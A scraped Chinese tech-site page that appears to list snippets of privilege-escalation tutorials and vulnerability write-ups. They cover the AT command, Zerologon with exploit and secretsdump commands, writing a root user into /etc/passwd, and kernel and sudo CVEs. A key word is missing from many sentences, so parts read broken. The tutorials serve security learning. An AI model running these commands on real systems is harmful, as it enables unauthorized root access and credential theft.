首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

(一) AT命令

就是一个低权限向高权限转化的过程 基于之前的文章,我们获取了一个低权限账户,现在朝着高权限进发 我们现在既然有了低权限账号密码,那么我们就可以登陆3389等远程服务,从而使用一些本地的方法 在开始之前...Root 对于Linux来说,就只有两种权限,root,非root 其实对于非root也有两种情况,是否可以使用sudo 可以使用sudo的用户可以获取到部分root权限 ---- at命令...这个方法相对来说有些古老,之前我在一些技术书籍中还能看到 at 命令的原理是at 命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限 Win2003 & XP中还是存在的...可以看到我们的权限已经是system了 这个是本地,我们看看能不能远程(3389属于本地了哈) 远程需要反弹一个system的shell,我们以nc为例 首先我们用echo命令吧需要执行的命令写入到批处理中

3.7K30
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    漏洞系列分析-Zerologon漏洞分析

    本文是域漏洞系列分析中的Zerologon漏洞分析部分-其他部分还有几年的域漏洞和域手法 2020年08月11日,Windows官方发布了 NetLogon 特权提升漏洞的风险通告,该漏洞编号为...Impacket 是一组用于处理网络协议的 Python 类。Impacket 专注于提供对数据包和某些协议(例如 SMB1-3 和 MSRPC)协议实现本身的低级编程访问。...git clone https://github.com/SecureAuthCorp/impacket.git cd impacket python3 setup.py install 图6- 安装...proxychains4 python3 cve-2020-1472-exploit.py win-3o8g1o8vv2e$ 192.168.0.111 图6- 使用cve-2020-1472-exploit.py...proxychains4 python3 secretsdump.py -no-pass -just-dc win-3o8g1o8vv2e.rd.com/win-3o8g1o8vv2e\$@192.168.0.111

    2.2K30

    什么是 为了提高自己在服务器中的权限所进行的操作 主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞上传shell,以夺得该服务器权限。...类别 本地 配置 漏洞 本地 1.AT命令 首先以administrator身份打开cmd ?...漏洞 烂土豆 属于令牌 限制条件 需要支持SeImpersonate或者SeAssignPrimaryToken权限 开启DCOM 本地支持RPC或者远程服务器支持PRC并能成功登录 能够找到可用的.../add 利用配置不当 与利用漏洞相比,此方法更常用 大部分企业,会对系统的漏洞即时进行补丁更新,很难通过系统的漏洞进行入侵; 查找系统中以system权限启动的服务或应用,可以尝试将其替换或者反弹...system权限 ②.mof 1、win2003 以下版本 2、secure_file_priv参数不为null ③.反弹shell 2.Sql server ①、有sa权限 ②、有dba

    2.3K72

    Linux之passwd

    渗透场景当我们获得了某个Linux服务器的低权限之后,我们想要对该低权限账号进行,以执行更多的操作,而在过程中发现当前用户具有/etc/passwd文件的写权限,此时我们可以写一个用户进去完成...流程确定可写首先查看/etc/passwd 的权限,发现任何用户都可以对/etc/passwd文件进行读写操作:ls -lh /etc/passwd写入用户接下来要做的就是自己构造一个用户,在密码占位符处指定密码...echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd在这里我们也可以使用其他的语言来审查带有盐值的密码:Python...:python -c 'import crypt; print crypt.crypt("password@123", "$6$salt")'PHP:php -r "print(crypt('aarti

    69910

    域渗透之Zerologon域漏洞

    域渗透之Zerologon域漏洞 组件概述 Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。...漏洞概述 该漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。.../target: /account:$ /exploit 或使用脚本 python3 cve-2020-1472-exploit.py -n server2012 -t 10.211.55.12...-n指定域控计算机主机名 -t指定域控ip 运行exp,确定把域控机器账户密码置换成空 完成后使用 python secretsdump.py 域名/ADD-DC$@192.168.11.15 -no-pass...sam.save get security.save # 删除文件 del /f system.save del /f sam.save del /f security.save 解密本地凭据 python3

    82300

    Linux漏洞(CVE-2019-13272)

    0X00 漏洞描述   kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系...只可在界面模式下利用,总体实际使用比较鸡肋 0X01 影响版本    Linux Kernel < 5.1.17 0X02 漏洞复现 VMware虚拟机:Ubuntu18.04.1 poc地址:https...://github.com/CrisWang/Exploit-Virtual-Machine/blob/master/Linux/01-CVE-2019-13272.c 漏洞POC下载,放在Home目录下...0x2 对下载好的漏洞POC进行编译,运行编译好的文件 gcc cve-2019-13272.c -o cve-poc ..../cve-poc 0x3 成功获取root权限 0x03 漏洞修补 补丁下载:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git

    64010

    Windows Java Usage Tracker本地漏洞分析

    反之,该漏洞可以用于权限提升,从而使攻击者可以访问受漏洞影响系统中的资源,这些资源通常受到保护,或仅限于特定应用程序或用户才有权访问。...我们通过Zero Day Initiative,与Oracle合作修复了这一漏洞,该漏洞已经在Oracle的2018年10月更新中实现修复。因此,需要敦促个人用户及企业尽快更新他们的Java版本。...在本文中,我们将深入研究这一漏洞在Windows上的出现原因、Java Usage Tracker的工作原理以及实现漏洞利用所必要的条件。...目前,这个功能似乎是不能被利用的,但是如果结合了其他安全漏洞,就能够被攻击者利用。 借助自定义属性实现漏洞利用 下面,我们详细说明如何借助自定义属性实现漏洞利用。...攻击者为实现权限提升,可能会组合利用一些漏洞,这些漏洞包括: 1、任意文件类型创建:该漏洞可以通过oracle.usagetracker.logToFile路径实现。

    97420

    CVE-2017-1000367:Sudo 本地漏洞

    2017 年 5 月 30 日, 国外安全研究人员发现 Linux 环节下,可以通过 sudo 实现本地漏洞漏洞编号为 CVE-2017-1000367,该漏洞几乎影响了所有 Linux 系统。...详情如下: 漏洞编号: CVE-2017-1000367 漏洞名称: Sudo 本地漏洞 官方评级: 高危 漏洞描述: 当确定 tty 时,Sudo 没有正确解析/ proc / [pid] / stat...(adsbygoogle = window.adsbygoogle || []).push({}); 漏洞利用条件和方式: 本地利用 漏洞影响范围: Sudo 1.8.6p7 到 1.8.20 Red...Raspberry Pi 12-SP2 SUSE Linux Enterprise Server 12-SP2 SUSE Linux Enterprise Desktop 12-SP2 OpenSuse 漏洞检测...: 可以使用以下命令查看 sudo 版本: sudo -V 漏洞修复建议 (或缓解措施): 目前阿里云官方软件源已经同步更新,可以通过以下命令更新补丁: Ubuntu/Debian: sudo apt-get

    1.7K20
    领券